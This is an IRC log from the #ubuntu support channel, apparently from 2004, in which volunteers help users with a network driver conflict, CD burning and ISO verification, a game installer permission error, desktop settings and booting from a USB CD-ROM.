
=== udo [~udo@VPNPOOL01-0039.UNI-MUENSTER.DE] has joined #ubuntu
StValentinit worked under windows 2000, win Xp and BeOS12:00
StValentinis there a way to reinstall the drivers or so?12:00
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HrdwrBoBStValentin: can you paste the outptu of lsmod into #flood ?12:01
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HrdwrBoBrun a terminal12:01
StValentina..a command12:01
HrdwrBoBand just run 'lsmod'12:01
StValentinyea the problem is that it's on the laptop and there is no way I can copy paste on this computer12:02
HrdwrBoBwell run lsmod12:02
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HrdwrBoBand tell me if eepro100 or e100 is there12:02
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HrdwrBoBif it's there, the driver is loaded and it just needs to be configured12:02
captineif you type 'sleep 10s' in your bash scripts, does the script wait to seconds or some other time measurement12:02
HrdwrBoBcaptine: 9-10 seconds12:03
StValentinit says mii 4864 2 eepro100,e10012:03
HrdwrBoBok cool12:03
jpswhat does this mean: "the extra buttons are recognized (verified with printk()s)"12:03
HrdwrBoBcomputer-> system configuration-> networking12:03
StValentinwhy can't I ping some other computers than`?12:03
StValentinI tryed12:03
HrdwrBoBjps: dmesg will tell you12:03
captineshot HrdwrBoB12:03
StValentinthis XP is configured to share the internet connection12:04
StValentinso it's also a DHCP server12:04
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jpsHrdwrBoB: i don't understand what you mean by that answer12:04
HrdwrBoBok, so you've set ubuntu to use dhcp (which is the default)12:04
StValentinand it should get the IP from it..but it doesn't work12:04
HrdwrBoBjps: run 'dmesg' in a terminal12:04
StValentinI tryed seting an IP manualy12:04
jpsHrdwrBoB: and then?12:04
StValentinbut I can't ping the other computer12:04
StValentinsry..wrong keyboard12:05
HrdwrBoBjps: that will give you the ouptut of the 'printk' stuff, telling you about the extra buttons12:05
StValentinwhyt should I try than?12:05
HrdwrBoBStValentin: well, I assume you've checked the physical link12:05
HrdwrBoBand it's on12:05
StValentinI tryed 2 cables12:06
jpsHrdwrBoB: i see. unfortunately i don't have the extra buttons he speaks of being detected :(12:06
HrdwrBoBset the interface to DHCP12:06
HrdwrBoBand then run /etc/init.d/networking restart12:06
StValentinhow do I set it to shcp? from system config or with ifconfig?12:06
HrdwrBoBfrom system config12:06
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HrdwrBoBjust go properties12:07
HrdwrBoBand then set it to automatic (DHCP)12:07
StValentinok..I did12:07
StValentinnow it tryes to save the settings or something12:07
HrdwrBoBand you ran networking restart?12:09
StValentinit says : reconfiguring network interfaces12:09
AcridienHrdwrBoB: I have set a static ip in my LAN box and router/modem cable12:09
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StValentinsince 2 minutes allready12:09
HrdwrBoBStValentin: and it hasn't returned yet?12:09
StValentinok..it did it12:09
StValentinlet me ping again12:09
HrdwrBoBwhat does ifconfig say12:10
AcridienHrdwrBoB: would you advise me to set DHCP ?12:10
AcridienHrdwrBoB: i have only one pc12:10
HrdwrBoBAcridien: with one PC, you don't need DHCP :)12:10
StValentinno IP..nothing..he found no DHCP server12:10
HrdwrBoBAcridien: if you run a network, DHCP  is very handy12:10
AcridienHrdwrBoB: oki i was wondering tx12:10
HrdwrBoBStValentin: ok, if you run ifconfig -a , how many network cards are there12:11
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StValentinI never had problems under other OSes..not even under BeOs..I should maybe boot in windows 2000 and try it there..12:11
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StValentinI see 312:11
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StValentinany advices why it doesn't work?12:15
Matt|so i was thinking of attempting to compile some xorg packages for myself. But this is my second week using a debian based OS. Is compiling easy? How can I do it? is there a good guide?12:15
HrdwrBoBStValentin: so you have both eepro100 and e100 loaded?12:16
StValentinI booted in windows 2000 with same card and cable and it works12:16
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HrdwrBoBMatt|: don't do it, wait for it to be released in hoary12:16
StValentinnow I am booting again12:16
StValentinin linux12:16
Matt|HrdwrBoB, i am not using Hoary. Plus it will be broken :012:16
HrdwrBoBno, not yet12:17
HrdwrBoByou will have to wait :)12:17
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HrdwrBoBI assure you, if you install it yourself it will be broken :)12:17
HrdwrBoBStValentin: just check what modules you have loaded12:17
HrdwrBoBand tell me anything with '100' in it12:17
Matt|HrdwrBoB, now thats just not very trusing ;P12:17
HrdwrBoBMatt|: I'm a realist :)12:19
Matt|HrdwrBoB, grrrr damn realists12:19
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HrdwrBoBMatt|: compiling X is like stabbing yourself in the face12:19
HrdwrBoBonly less fun12:19
SoNiCfReAkhow do I get the trash applet on the desktop in Gnome?12:19
Matt|HrdwrBoB, nice image12:19
StValentinthis laptop has also a wiFi lan card I think12:19
=== Matt| downloads X
StValentincan this be the problem?`12:19
Matt|HrdwrBoB, i have done it before and it went _ok_12:20
Matt|except for some problems with fonts12:20
StValentinI receive when booting some strange error messages12:20
Matt|StValentin, you are trying to get the wifi card working?12:20
HrdwrBoBStValentin: what messages?12:20
StValentinmofprobe: FATAL: error insertin pciehp: Operation not permitted12:20
HrdwrBoBStValentin: that's normal12:21
StValentinmodprobe: FATAL: Error inserting shpchp: Operation not permitted12:21
SoNiCfReAkdoes anybody have x.org working yet?12:21
Matt|SoNiCfReAk, yes i think some do12:21
StValentinno..I don't want the wifi card to work..just the normal lan card12:22
SoNiCfReAkis up on hoary yet?12:22
Matt|SoNiCfReAk, nope12:22
jdubSoNiCfReAk: no12:22
StValentinthe wifi card is disabled..there is a button that I can use to shut it down12:22
=== ..[topic/#ubuntu:HrdwrBoB] : http://www.ubuntulinux.org/support/documentation/faq/ || Wiki: http://wiki.ubuntu.com/ || Lists: http://lists.ubuntu.com/ || Bugs: http://bugzilla.ubuntu.com/ || warty is out, no X.org, please wait || Please don't paste in he channel, use http://www.pastebin.com/ || CDs will ship in a few weeks
SoNiCfReAkhow do I get the trash applet on the desktop in Gnome?12:22
Matt|SoNiCfReAk, was there by default on my install12:22
jdubSoNiCfReAk: you can't get the 'applet' on the desktop, applets are panel things12:22
SoNiCfReAkwell the icon12:22
jdubSoNiCfReAk: you can get a trash icon on the desktop though, see /apps/nautilus/general12:23
jdubi'd recommend sticking with the default for a while12:23
jdubit's way more useful12:23
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Matt|SoNiCfReAk, having the trash icon on the panel is quite nice i think12:23
Matt|hi jdub12:23
SoNiCfReAkim in XFCE12:23
Matt|StValentin, what is ifconfig eth0?12:23
StValentinsry..wrong keyoard again12:23
SoNiCfReAkand I want it on my XFCE desktop12:24
SoNiCfReAkusing nautilus12:24
StValentinit says nothing12:24
StValentinno IP address12:24
Matt|as per what jdub said ^^12:24
will_anyone like ICE desktop12:24
Matt|StValentin, you have output?12:24
Matt|will_, yep memememememe12:24
StValentinon screen yea..12:24
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StValentinif this is what you mean12:24
Matt|StValentin, light is on?12:24
SoNiCfReAkthere I got12:24
StValentinnetwork card has no light12:25
StValentinbut in the hub it is12:25
will_matt u like ICEWM12:25
Matt|will_, you betcha12:25
StValentinand I just booted in windows 2000 and it worked12:25
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StValentinon same laptop with same card and cablr12:25
Matt|StValentin, probably the module is not loaded12:25
StValentinhow can I check the module?12:25
will_Matt do you know how to change screen res in it12:25
Matt|will_, you can change your xf86config maybe?12:26
SoNiCfReAkhow do I set apps to start with XFCE 4.2 beta 2?  It doesn't load /~.xinitrc12:26
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Matt|StValentin, what card?12:26
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mikeAre there packages for KDE 3.3 anywhere?12:26
StValentinintel eepro 10012:26
Matt|so we're thinking maybe the module is pciehp?12:27
Matt|lemme have a look on the web12:27
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StValentinis I run lsmod12:27
HrdwrBoBStValentin: what does dmesg| grep -2 eth0 say12:27
StValentinI see in the list12:27
StValentinmii 4864 2 eepro100,e10012:28
jdubmbp_: hey hey!12:28
mbp_ho ho!12:28
jdubmbp_: that's what my mum said. :|12:28
mbp_sorry dude :)12:28
StValentinit says a lot12:28
SoNiCfReAkhas anybody out there compiled x.org 6.8.1 from CVS12:28
SoNiCfReAkI need a little help12:29
StValentine100 Intel corporation12:29
HrdwrBoBStValentin: ok, try rmmod eepro10012:29
Matt|StValentin, you see a line beginning with eepro100?12:29
HrdwrBoBwell, sudo rmmod eepro10012:29
StValentine100: eth0: 100_probe: addr 0xf7dff000, irq 1112:30
StValentineepro.c: v1.09j-t12:30
HrdwrBoBit looks like you have two drivers loaded for one card12:30
StValentineepro100.c sry12:30
StValentinI see 2 lines actualy12:30
StValentinand another line eepro100.c $Revision 1.3612:31
StValentinhow can I remove one?12:31
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HrdwrBoBStValentin: sudo rmmod eepro10012:32
HrdwrBoBafter that, do a dmesg|grep e100_watchdog12:32
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HrdwrBoBit should tell you that the link is up and the speed12:32
StValentinit does12:32
StValentinwhat now?12:33
HrdwrBoBnow run /etc/init.d/networking restart12:33
StValentinrestart networking?12:33
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StValentinafter next reboot must do this again?12:34
HrdwrBoBwe'll just try and get it working at all first :)12:34
StValentinit didin't worked12:35
HrdwrBoBonce it's working, then we can make sure it'll work on reboot12:35
StValentinshould I try set it up manualy?12:35
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|trey|Any reason why the Gaim text format bar is dulled out?12:35
StValentinany ideas?12:35
WWWhat is the correct way to burn an ISO with cdrecord?   I tried: cdrecord /dev/hdd file.iso12:36
HrdwrBoBWW: just right click on it12:36
HrdwrBoBand select burn to CD12:36
mbp_WW: using gnome is much easier12:36
mbp_do you really need to use the commandline?12:37
StValentinnow the lsmod shows me no eepro in list anymore12:37
HrdwrBoBStValentin: that's right it shouldn't12:37
WWHrdwrBoB: Right, but I want to try it with cdrecord.  I filed a bug about nautilus, and I want to compare the results of the two methods.12:37
HrdwrBoBso in network settings12:37
HrdwrBoBWW: cdrecord dev=/dev/hdd speed=foo -eject -v foo.iso12:37
mbp_WW; you need to determine the pseudoscsi address of your recorder, then12:37
HrdwrBoBmbp_: nah you can fudge it12:37
stuNNed_what gstreamer plugin do i need to play mp3's in rhythmbox?12:38
HrdwrBoBstuNNed_: gstreamer-mad12:38
stuNNed_HrdwrBoB, danke12:38
WWThe simple command "cdrecord /dev/hdd file.sio" printed this (after some initial text):12:38
StValentinshould I go in network settings?12:38
HrdwrBoBStValentin: can you confirm the network settings12:38
WWscsidev: '1,5,0'12:39
WWscsibus: 1 target: 5 lun: 012:39
WWcdrecord: No such file or directory. Cannot open '/dev/sg*'. Cannot open SCSI driver.12:39
StValentinI still see it there12:39
StValentinand in properties it says automatic FHCP12:39
HrdwrBoBWW:I just told you the commmand to run12:39
StValentinshould I try to activate it?12:39
WWHrdwrBoB: Yup, I haven't tried it yet.12:39
HrdwrBoBStValentin: yes12:39
HrdwrBoB.. you mean it wasn't active?12:40
WWHrdwrBoB: I'm not sure what to use for "foo" in your command.12:40
chzdoes anybody know how to create an iso from a directory..??12:40
StValentinnow it wasn't coze when I try to it deactivates itself12:40
HrdwrBoBWW: in speed?12:40
HrdwrBoBit's the speed of the burner12:40
chzi tried mkisofs....but then it just printed in garbage..12:41
StValentinif I set it up manualy with an IP address I can activate it12:41
StValentinbut still no ping12:41
WWHrdwrBoB: Right, the speed.12:41
Matt|i tell you what. I've been able to recommend ubuntu to my friends who don't know anything about linux and have the confidence that things will work, and that they will be well supported in here if there are any problems. Not only that, but it looks good and works really well. Thanks ubuntu developers!!12:41
StValentinbut still no ping12:41
StValentinI can not activate it12:42
StValentinwith DHCP seted in properties12:42
StValentinI tryed and now I see in lsmod list a module e10012:42
HrdwrBoBWW:what's the bug in nautilus12:42
SoNiCfReAkhas anybody out there compiled x.org 6.8.1 from CVS?12:43
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HrdwrBoBSoNiCfReAk: no, and we don't recommend you do12:43
Matt|heh i know some people have12:43
HrdwrBoByou're welcome to do it12:43
tobidoes anyone know when hoary hedgehog will be released12:43
SoNiCfReAkwhy bob?12:43
Matt|tobi,  april12:43
HrdwrBoBtobi: in about 6 months12:43
HrdwrBoBSoNiCfReAk: because it's a huge waste of time :)12:43
Matt|waste of time?12:44
StValentinok guys..thx for help but I think I convinced myself how easy is to use this linux12:44
StValentinI will wait another year and try again12:44
Matt|StValentin, i think you have a difficult network card :(12:44
=== Ruffian|JANE| [~jane@dhcp024-209-106-036.woh.rr.com] has joined #ubuntu
Matt|sorry that you've had this failure: try some websites!12:44
StValentinI have an Intel EEPRO 100!! under BeOS is working greate12:44
StValentinsame under Windows XP12:44
StValentinand windows 200012:44
Matt|StValentin, yes i know12:44
WWHrdwrBoB: OK, it has started burning.  I guess the speed argument is _not_ an option?  The man page makes it sound like it should try to figure it out.12:45
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Matt|StValentin, don't give up!12:45
balubahi again12:45
HrdwrBoBWW: it defaults to 1, or at least it used to12:45
WWHrdwrBoB: I mean, the speed argument is _not_ optional.12:45
StValentinI won't I'll just try in a few months..maybe gets beter all this linux stuff12:45
mdzStValentin: known bug, easy workaround, fixed in Hoary12:45
LinuxJonesStValentin, do you use dhcp to get on your network ?12:45
SoNiCfReAkwhy is getting x.org working a waste of time HrdwrBob?12:46
HrdwrBoBthis is why using cdrecord on the command line is bad12:46
LinuxJonesStValentin, is the module eepro100 loaded ?12:46
Matt|mdz, give him the workaround!!12:46
HrdwrBoBSoNiCfReAk: 'getting x.org' is not a waste of time12:46
StValentinI have an XP machine with internet connection sharing enabled12:46
StValentinwhat means loaded?12:46
HrdwrBoBSoNiCfReAk: compiling x.org from source is a waste of time12:46
StValentinI see in lsmod list a line like:12:46
LinuxJonesmdz, yas a fix for you12:46
LinuxJonesmdz, er has12:46
Matt|HrdwrBoB, you haven't said why it is a waste of time12:46
HrdwrBoBa) it will be all over the place, and unpackaged12:46
StValentinmii 4864 1 e10012:47
balubaubuntu is not by default in utf-8, isn't that?12:47
Matt|HrdwrBoB, i can understand the argument that it might be difficult, but not a waste of time12:47
Matt|baluba, correct12:47
HrdwrBoBb) it will be out in a nice packaged form in the reasonably near future12:47
SoNiCfReAkhow near?12:47
SoNiCfReAklike 6 months?12:47
mdzif anyone had searched bugzilla for a few of the keywords in this conversation...12:47
HrdwrBoBc) it's doubtful that you really need these features12:47
balubaMatt|, wouldn't it better to make it default?12:47
thoreauputicStValentin: there are two possible modules, apparently: e100 and eepro10012:47
Matt|baluba, maybe. I don't know much about that. the next release is utf-8 default12:47
StValentinI should now unload this one and load the other one right?12:48
StValentinhow do I do that?12:48
mdzStValentin: open that URL and read it12:48
Scognitohoary maybe will be utf-8 by default12:48
StValentinrmmod e100?12:48
balubaMatt|, ok, right choice12:48
HrdwrBoBmdz: and we went through and worked out that eepro100 was excessive12:48
HrdwrBoBhowever his network still isn't working12:48
thoreauputicStValentin: rmmod <modeule>  modprobe <othermodule>12:48
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StValentinthat didn't help12:49
StValentinI did it before12:49
balubaScognito, i hope so. it's about time Os adopt it12:50
WWHrdwrBoB: Thanks, the cdrecord command worked.  However, when I try to find the md5sum of the disk, I get an Input/output error.  That's what happens when I burn a CD with Nautilus, too, and that's the bug that I filed.12:50
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LinuxJonesStValentin, did you restart networking after removing the wrong module ?12:51
WWHrdwrBoB: If I used k3b to burn a CD, the command "md5sum /dev/hdd" gives me the same result as the md5sum of the original file.12:51
LinuxJonesStValentin, and the correct one is loaded ?12:51
StValentinwhich one is correct one?12:51
StValentinor eepro100?12:51
mdzStValentin: e10012:51
StValentinyes it was12:52
LinuxJonesStValentin, according to bugzilla e10012:52
mdzStValentin: follow the instructions in the bug and reboot12:52
balubaWW, i'd check your HD then :)12:52
StValentini did12:52
StValentinit doesn't work12:52
WWbaluba: But what should I check?  k3b works fine.12:52
StValentinbaluba..are ya romanian?12:52
HrdwrBoB10:32 < HrdwrBoB> StValentin: sudo rmmod eepro10012:52
mdzStValentin: you added eepro100 to /etc/hotplug/blacklist?12:53
StValentinnow..that not12:53
StValentinbut should work without that to first right?12:53
captinehow does one format a cd-rw.  I use XCDRoast to burn, and there are no format options?12:53
balubaStValentin, what's a romanian?12:54
thoreauputicStValentin: if you don't use blacklist,, it won't work12:54
StValentinit a man that comes from Romania..da...where are ya from moon?12:54
StValentinok..I'll try that too12:54
mjrcaptine, hm, it's a xcdroast bug if it really doesn't, but you can do it from the command line with cdrecord blank=fast12:54
balubaWW, I/O errors are a signal of err I/O errors, i'd check your block device if it's really so12:55
Matt|captine, there is an option12:55
Matt|captine, which screen do you use to burN? the master screen?12:55
WWbaluba: OK!                                                               How do I check my block device?12:55
balubaStValentin, Italy12:55
balubaWW, can you paste the output of md5sum?12:56
StValentinbaluba means something funny in romanian language..that is why I asked12:56
WWbaluba: Sure thing:12:56
WWerror processing /dev/hdd: failed in buffer_read(fd): mdfile: Input/output error12:56
captineMatt| i just installed XCDRoast 2nite.  Just had a brief look at it, so i couldn't say12:56
balubaStValentin, what? :)12:57
captinemjr thanks.  Will try from command line12:57
Matt|ok if you are using the Master screen, over on one of the right hand tabs, there is a "blank cd" option12:57
balubaWW, is that the cdrom?12:57
captinedo you all emulate scsi on ur IDE cd-writers?12:57
WWbaluba: yes12:57
HrdwrBoBcaptine: no12:57
Matt|captine, no12:57
balubaWW, never mind then, i thought you have I/O errors on the iso12:58
captineshot Matt| Isn't it better to emulate scsi??12:58
HrdwrBoBcaptine: no, there's no need12:58
Matt|captine, doesn't make a big difference12:58
Matt|captine, marginal12:58
thoreauputiccaptine: deprecate in 2.6.* kernels12:58
StValentinbaluba.. it means dick ...12:59
StValentinin romanian I mean12:59
mdzStValentin: that's what the bug tells you to do (edit the blacklist), and you said that you followed the instructions there12:59
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balubaStValentin, well better to know the not01:00
StValentinno somone told me what to do..01:00
StValentinI thought that that is so that after reboot won't heapend again01:00
Matt|baluba, don't use that name if you go to romania01:00
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captineMust say, i'm still running slack 10 with 2.4 kernel (still waiting for ubuntu cd's to arrive)01:00
HrdwrBoBmdz: the bug doesn't infact say how to do that, all that's mentioned of the blacklist is at the end where you posted your changelog01:00
StValentinI did it..01:00
HrdwrBoBthe bug says 'I ran rmmod eepro100 and it worked'01:00
StValentinno success01:00
balubaMatt|, luckly just a nick :)01:01
Matt|baluba, would be a strange name if real :p01:01
StValentinI will try to reboot01:01
mdzHrdwrBoB: I added an explicit note to the end of the bug when I pasted the URL01:01
StValentinlast try...if it dowsn't work than I will just go bac to BeOS for another 6 months and try again..01:02
StValentincoze this is my 4th distro and only problems01:02
Matt|i have an interesting thing. When I start mplayer and play some audio, i get flashing messages and I have to edit the OSS settings from /dev/mixer to /dev/.mixer01:02
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HrdwrBoBmdz: so you did, I see it now01:03
StValentinok... doesn't  and I did that change01:04
StValentindoesn't work I mean01:04
StValentinI go to sleep now..01:04
WWAfter running md5sum /dev/cdrom, there are errors reported in /var/log/messages01:04
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WWRoughly the same three lines repeated many times.01:05
lonytynchhey guys when are the CDs planned to ship?01:05
StValentinand I am a computer programer..lol..and people say Linux is ready for newbees..lol..yea sure01:05
WWNov  2 19:03:03 localhost kernel: hdd: command error: status=0x51 { DriveReady SeekComplete Error }01:05
eruditusHelp - I have a palm pilot that's being detected by the device manager but not by any of the palm pilot apps (Gnome-pilot, jpilot, kpilot). What do I do?01:05
HrdwrBoBStValentin: there is something odd with your setup, everthing is configured correctly and it should work01:05
StValentinthe problem that this is allways the case with linux..maybe if you know it it's not..but for me the whole stuff is a mistery01:06
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captinei am downloading at 500 bytes per second.  I hate ZA01:06
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HrdwrBoBStValentin: I've installed ubuntu on about 10 entirely different computers and not once have I had a problem which required extensive knowledge to fix01:07
eruditusAnyone - Help!!!01:07
HrdwrBoByour problem is possible related to windows on the other end, or some other bizarre hardware problem01:07
HrdwrBoBor a configuration you've changed that I can't see or tell from here01:07
thoreauputicStValentin: funny, lots of people have no problems... Your hardware/ setup is not typical01:07
StValentinhow is not typical?01:08
HrdwrBoBStValentin: it's not typical in that it doesn't work :)01:08
StValentin<I have intel eepro 100 on 3 different computers01:08
thoreauputicStValentin: I just mean most people don't have major problems01:08
HrdwrBoBStValentin: I was using an eepro100 laptop last night with ubuntu01:08
eruditusproblem with my Palm - anyone willing to help ???????????????????????'01:08
HrdwrBoBeruditus: how is it not detected?01:09
StValentinI tryed Fedora, Mandrake and Suse..only problems01:09
WWAny ideas what the error  "... hdd: command error: status=0x51 ..." means?01:09
WW(in /var/log/messages)01:09
HrdwrBoBWW: I think it's trying to read beyond the end of the device01:09
thoreauputicStValentin: does it work with Knoppix?01:09
StValentinnever tryed it01:09
HrdwrBoBWW: if you ran cat /dec/hdd > file.iso01:09
Matt|ok Problem: i have grip installed. I just installed lame (after grip) and now i get an error when trying to encode using lame (invalid executable); how can i fix this???01:09
HrdwrBoBit would likely match01:09
thoreauputicStValentin: Knoppix has a great reputation for finding hardware etc01:09
HrdwrBoBpossibly k3b puts an EOF marker after the ISO or somesuch01:10
StValentinI also tryed gentoo but with that I wasn't even able to boot..01:10
eruditusHrdwrBoB, it _is_ detected by the hardware manager, but not by any of the pilot programs.01:10
eruditusHrdwrBoB, I can't figure out, from this, what /dev/ it's on...01:10
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captinethanks for the help.  Goodnite01:11
WWHrdwrBoB: I'll try that.  I have tried "dd if=/dev/cdrom of=copy.iso", but that also gives an Input/output error.01:11
HrdwrBoBeruditus: are you following any sort of guide or how to?01:11
erikhey, is there any way to install from the livecd?01:11
StValentinby all..thx anyhow01:11
HrdwrBoBWW: yes, but after it gives that, it's finished01:11
HrdwrBoBWW: that's normal01:11
eruditusHrdwrBoB, I wouldn't know where to find one...01:11
HrdwrBoBWW: isosize /dev/hdd will give you the size, and you can feed that to dd if you like01:11
WWHrdwrBoB: Hmmm... error messages are not normal.01:11
eruditusHrdwrBoB, I can give you the info from the device manager...01:18
HrdwrBoBWW: it is normal01:18
WWHrdwrBoB: OK, but it _shouldn't_ be normal.01:18
HrdwrBoBWW: well, it's simply trying to read from the device, and there's no end marker01:18
HrdwrBoBonce it gets to the end01:18
HrdwrBoBit keeps trying to read01:18
eruditusHrdwrBoB, (not all of it, obviously... just tell me what you need.)01:18
HrdwrBoBand fails, hence, the error01:18
HrdwrBoBeruditus: there should be some doco for how to use gnome-ilot etc01:18
WWHrdwrBoB: So that is a bug in the cd writer, for not correctly marking the end?01:18
HrdwrBoBWW: it may be, I've never used k3b and I've always had that I/O error01:18
HrdwrBoBWW: or it may be nonstandard and k3b is making CDs that are not-standard but happen to work01:18
WWHrdwrBoB: I tried "cat /dev/cdrom > copy.iso", but that also gives the error, and the file copy.iso is not even the same size as the original.01:18
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eruditusHrdwrBoB, I've been following the instructions, but they don't speak of anything similar... the help file is also fairly useless...01:18
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HrdwrBoBeruditus: what palm is it?01:18
HrdwrBoBI presume it's a usb interface01:18
HrdwrBoBdoes it load an appropriate module when you plug it in?01:18
HrdwrBoBwhat does dmesg say01:18
eruditusHrdwrBoB, Tungsten E - seen as Tungsten T by the Device Manager01:18
eruditusHrdwrBoB, it is a usb interface. What's dmesg?01:18
HrdwrBoBeruditus: run 'dmesg' on a terminal and it gives you kernel messages01:18
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HrdwrBoBwhat driver is loaded/loading etc etc01:18
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eruditusHrdwrBoB, may I msg you a section of the results?01:18
HrdwrBoBpaste it on #flood01:18
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eruditusHrdwrBoB, ok.01:18
WWHrdwrBoB: Sorry to be a pest... I don't have the command "isosize".01:21
HrdwrBoBit's in sg-utils for some reason :)01:21
HrdwrBoBsudo apt-get install sg-utils01:22
WWHrdwrBoB: Ah, I see.  I just checked, and it looks like sg3-utils is actually the correct package.01:23
HrdwrBoBapt-cache is telling me lies!01:24
WWHrdwrBoB: Wait, maybe not.01:24
WWHrdwrBoB: I'm just reading the blurbs in Synaptic, and in fact isosize is in sg-utils. Sorry.01:24
WWHrdwrBoB: I just thought it strange to install the package that is for kernel 2.2 :)01:27
|trey|WW, 'blurbs in synaptic' = apt-cache show output ;)01:27
HrdwrBoBapt-cache search isosize gave me sg-utils01:27
WWIt says sg3-utils is for kernel 2.4, but apparently isosize is not included with sg3-utils.01:27
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Se7h./setup.sh: line 88: /home/seth/.setup17633: Permission denied01:30
Se7hThe setup program seems to have failed on x86/glibc-2.101:30
Se7his this a lack of a lib01:30
Se7hor just an error on the file ?01:30
Matt|ok Problem: i have grip installed. I just installed lame (after grip) and now i get an error when trying to encode using lame (invalid executable); how can i fix this???01:30
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mbp__join #arch01:30
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TelepHaving nothing very interesting to do, I moved to Hoary...01:33
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levdoes anyone have a reccomendation for a PCI usb 2.0 adapter?01:34
LarryDC33Please forgive me if this is in bad form.01:34
LarryDC33Has anyone installed Ubuntu on a Fujitsu P1120?01:34
HrdwrBoBlev: I'm not sure it really matters01:35
levHrdwrBoB: how so?01:35
HrdwrBoBlev: that's a monitor01:35
HrdwrBoBlev: I've never seen one that didn't work, and they're all cheap as chips01:35
levHrdwrBoB: super.01:35
levHrdwrBoB: what's the transfer rate? close to max?01:35
HrdwrBoBpretty much01:36
HrdwrBoBwell I get ~4mb/s out of my stock standard via onboard thing01:36
levi would've expected there'd be linux-specific problems...01:36
HrdwrBoBUSB is a fairly standard standard01:36
Se7hcan someone help me plz ?01:36
HrdwrBoBSe7h: only if you tell us the problem01:38
thoreauputicSe7h: setup for what?01:38
Se7h<Se7h> ./setup.sh: line 88: /home/seth/.setup17633: Permission denied01:38
Se7h<Se7h> The setup program seems to have failed on x86/glibc-2.101:38
Se7h<Se7h> is this a lack of a lib01:38
Se7h<Se7h> or just an error on the file ?01:38
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Se7hthoreauputic unreal tournament01:38
thoreauputicSe7h: what is the setup.sh script? Could be just about anything01:38
Se7hi suppose its the lib01:38
Se7hcause i'vr installed it before01:40
LinuxJonesSe7h, did you sudo before trying to install ?01:40
WWHrdwrBoB: The size of the original iso file agrees with size reported by "isosize /dev/cdrom". I tried copying from the cd with "dd count=438839296c if=/dev/cdrom of=anothercopy.iso", and the did not report an error, but the file is smaller than the original01:40
LinuxJonesSe7h, is this from CD/DVD ?01:40
HrdwrBoBWW: then you got your dd options wrong :) .. dd is an annoying POS01:40
Se7hthe setup runs and then asks for the cd01:40
Se7hbut i'm not even getting there01:40
Se7hjust returns me the error at the beggining01:40
HrdwrBoBWW: how far wrong is the size01:40
LinuxJonesSe7h, your cd is mouning with noexec option you need to re-mount with the exec option01:42
HrdwrBoBWW: but in any case, you can see the problem is what I said it was01:42
WWHrdwrBoB: Actually, the file anothercopy.iso is identical to the file created by "cat /dev/cdrom > copy.iso"01:42
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HrdwrBoBthat should be right01:42
HrdwrBoBbut it's not the same as the original iso?01:42
Se7hLinuxJones but the "insert cd" part is after this01:42
levSe7h: or copy the .sh file to your hard drive, make sure you have executable rights on it and try running the installer01:42
lev(that's how i did it, at least)01:42
WWHrdwrBoB: Right, the copies are smaller than the original, by about 34k (and not exactly 32768 :)01:42
Se7hlev the sh is on the hard drive01:42
LinuxJonesSe7h, but it needs root privilege to proceed with the install01:42
Se7hi've run it with sudo01:42
LinuxJonesSe7h, or rather execute01:42
LinuxJonesSe7h, that doesn't matter01:43
HrdwrBoBWW: how much exactly01:43
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LinuxJonesSe7h, sudo is not root01:43
LinuxJonesSe7h, do mount in console01:43
LinuxJonesSe7h, I bet it has noexec in there doesn't it ?01:43
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Se7hle'me check01:43
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Se7h(the sh is not on the CD!!)01:44
WWHrdwrBoB: 34816 bytes01:44
LinuxJonesSe7h, but you installing from cd I thought ?01:46
SuperQ18:38 <SuperQ> Insyte: you actualy got one?01:46
SuperQ18:38 <Insyte> Yeah.  It's sitting next to me as we speak.01:46
SuperQ18:39 <chris> Try not to get any Debian on you01:46
SuperQ18:39 <Insyte> chris: I'll wash my hands thoroughly after each use.01:46
Se7hu'r gettng it all wrong01:46
Se7hfrojm the beggining01:46
Matt|ok Problem: i have grip installed. I just installed lame (after grip) and now i get an error when trying to encode using lame (invalid executable); how can i fix this???01:46
Se7hi have a file called ut-bla.run01:46
LinuxJonesSe7h,  sorry I didn't read allyour messages ;P01:46
Se7hon my hard drive01:46
Se7hi've got to run it01:46
Se7hto install the files from the cd01:46
Se7hok now ?01:46
levso you do...01:46
HrdwrBoBWW: that doesn't divide by 2352 :/01:46
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Matt|Ruffian|JANE|, patience...01:46
HrdwrBoBRuffian|JANE|: you are screwed anyway01:46
WWHrdwrBoB: Nope.  (What is the significance of 2352?)01:46
Se7hlev i do ?01:46
levSe7h: what do you do next? what have you been doing?01:47
LinuxJonesSe7h,  what does ls-al output on the ut.run file ?01:48
Matt|can anyone help me with that grip problem???01:48
HrdwrBoBWW: CD sector size01:48
LarryDC33If I could slip a question in:Has anyone suceeded in installing ubuntu on a Fujitsu P1120?01:48
WWHrdwrBoB: Ah.01:48
HrdwrBoBLarryDC33: as I said before, isn't that a monitor01:48
HrdwrBoBspecifically a 21" monitor01:48
HrdwrBoBsupports 2048x1536 max res01:48
Se7hLinuxJones w801:48
HrdwrBoB1800x1400 recommended at 85h01:48
LarryDC33No it is a laptop.  I didn know that was to me.01:48
HrdwrBoBah ok01:48
HrdwrBoBP1120 is also a part number for rebadged sony 21" monitors01:48
levLarryDC33: are you having a specific problem?01:48
Se7hLinuxJones -rwx------    1 seth     seth01:48
LarryDC33It doesn seem to recognize the USB CDROM on boot so I need a way around that.01:48
LinuxJonesSe7h,  chmod 777 ut.run file01:48
yann__LarryDC33: got ubuntu running on a apple powerbook g401:48
LinuxJonesSe7h,  then install01:49
Se7h./setup.sh: line 88: /home/seth/.setup19825: Permission denied01:49
Se7hThe setup program seems to have failed on x86/glibc-2.101:49
levLarryDC33: i've heard of general booting issues with usb cdroms...01:49
Se7hsame thing01:49
levdo you have an internal drive you can use?01:49
LarryDC33No just a floppy & a hard drive01:50
levLarryDC33: hmm...01:50
yann__LarryDC33: that will be fun ;-)01:50
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levLarryDC33: have you had any success booting other stuff (knoppix/windows/etc) off the usb cdrom?01:50
[Phaedrus] Hey Guys01:50
thoreauputicSe7h: ls -l /home/seth/.setup19825   ?01:50
HrdwrBoBLarryDC33: do you have a 1gb usb key?01:50
HrdwrBoBor a flash reader and a 1gb+ card01:51
Se7hthoreauputic uh?01:51
LinuxJonesSe7h,  try looking in bugzilla or on google (with the error and debian as a search parameter) to see if there is a fix01:51
HrdwrBoByou can boot straight off that01:51
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[Phaedrus] Would anyone mind sending me a copy of the ubuntu cd? I can't possibly download the ISO with my dial-up connection01:51
thoreauputicSe7h: is it not saying permissiondenied for that path?01:51
Se7hLinuxJones that's what i was thinkin'01:51
HrdwrBoB[Phaedrus] : register online and one will be sent to you01:51
LarryDC33No.  I just wondered if someone here might have figured out a way to do it.  It doesn seem to want to boot of anything USB except the floppy.01:51
